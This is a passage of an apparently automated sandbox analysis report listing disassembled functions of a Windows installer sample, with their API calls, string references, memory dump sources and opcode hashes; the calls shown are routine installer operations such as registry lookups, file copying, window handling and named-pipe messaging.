                                                                                                                                                                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                                                                                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                                                                                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                                                                                                                                                  • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                                                                                                                                                  • Helper process exited., xrefs: 00458AC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                                                                                                  • API String ID: 3355656108-1243109208
                                                                                                                                                                                                                                  • Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                                                                                                                                  • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00454528 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                                                                                                                                                    • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RegCreateKeyEx, xrefs: 004545C3
                                                                                                                                                                                                                                  • , xrefs: 004545B1
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                                                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                  • API String ID: 2481121983-1280779767
                                                                                                                                                                                                                                  • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                                                                                                                  • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00496C50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                                                                                                                                    • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                                                                                                                                                    • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                                                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                                                                                                  • API String ID: 1549857992-2312673372
                                                                                                                                                                                                                                  • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                                                                                                                                  • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E418 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4190037839-2312295185
                                                                                                                                                                                                                                  • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                                                                                                                                  • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004629F0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 004629FC
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                                                                                  • API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                  • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                                                                                                                                  • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042F188 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F194
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                                                                                  • API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                  • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                                                                                                                  • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00458C1C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,020A3858,00000000), ref: 00458C79
                                                                                                                                                                                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                                                                                                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,020A3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                                                                                                                                                    • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                                                                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                                                                                                                  • API String ID: 2182916169-3012584893
                                                                                                                                                                                                                                  • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                                                                                                                                  • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00456D20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                                                                                                                                                    • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                                                                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                                                                                                                  • API String ID: 1914119943-2711329623
                                                                                                                                                                                                                                  • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                                                                                                                                  • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D80 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416E27
                                                                                                                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 375863564-0
                                                                                                                                                                                                                                  • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                                                                                                                                  • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
